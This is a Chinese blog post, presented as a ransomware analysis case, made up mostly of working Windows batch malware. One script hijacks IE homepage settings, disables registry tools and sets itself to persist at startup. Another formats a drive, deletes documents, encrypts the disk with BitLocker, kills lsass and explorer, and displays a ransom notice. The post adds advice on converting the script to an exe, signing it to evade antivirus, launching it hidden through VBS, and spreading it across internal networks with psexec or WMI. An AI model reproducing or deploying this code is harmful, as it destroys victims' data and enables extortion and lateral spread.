0%

勒索病毒分析案例

本篇所有代码具有攻击性,请在虚拟机测试,造成损失与本人无关

  1. 通过批处理修改IE注册表的方法

    QQ群:397745473

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
@echo off
# 改首页
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.baidu.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.baidu.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /t reg_sz /d www.baidu.com /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN" /v "Default_Page_URL" /t reg_sz /d www.baidu.com /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN" /v "Default_Search_URL" /t reg_sz /d www.baidu.com /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN" /v "First Home Page" /t reg_sz /d www.baidu.com /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN" /v "Search Page" /t reg_sz /d www.baidu.com /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN" /v "Start Page" /t reg_sz /d www.baidu.com /f

# 禁用注册表
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1/f
# 禁用主页修改
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
# 加启动项
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /t REG_SZ /d %windir%\system\oldboy.bat /f
# 把自己复制到system32目录中
copy %0 %windir%\System32\oldboy.bat

勒索病毒代码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
@echo off
# 格式化磁盘
echo y |format d: /q
# 快速删除文件
del c:\*.doc /s /f /q
# 使用windows工具加密磁盘
manage-bde -on d: -RecoveryPassword -RecoveryKey x:\
# 杀掉对话框
taskkill /f /im fvenotify.exe > null
# 用bde对x盘加密
manage-bde -protectors -add d: -rp -rk x:\
# 杀掉对话框
taskkill /f /im fvenotify.exe > null
# 延迟30
TIMEOUT /T 30
taskkill /f /im fvenotify.exe > null
echo hello > c:\windows\windows1.txt
# 写提示信息
echo "your company All your data have been deleted.If you........"
start c:\windows\windows1.txt
set superxiaoyuerc=echo
# 加IE启动
# 杀杀毒软件进程

# 杀桌面显示进程
taskkill /f /im explorer.exe > null
# 结束进程导致系统重启
taskkill /f /im lsass.exe > null
start c:\windows\hax0r.html

更多批处理可以参考工具:

1.吞噬者批处理编写器 http://www.ouyaoxiazai.com/soft/stgj/159/4616.html

2.Bat to exe Converter 工具 https://www.battoexe.com/

3.加数字签名绕过杀软查杀 工具 addSign.exe https://docs.microsoft.com/zh-cn/dotnet/framework/tools/signtool-exe

4.用vbs 调批处理

隐藏窗口调用BAT

1
2
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c c:\bingdu.bat",vbhide

1.把BAT 与 VBS文件压缩自解压

2.解压后运行 2.vbs

高级–>bingdu.bat

3.图标

4.全部隐藏

5.使用psexec进行内网传播

利用WMI代替psexec——WMIEXEC.vbs

内网传播更多参考 :https://www.t00ls.net/viewthread.php?tid=21167

QQ群:397745473

欢迎关注我的其它发布渠道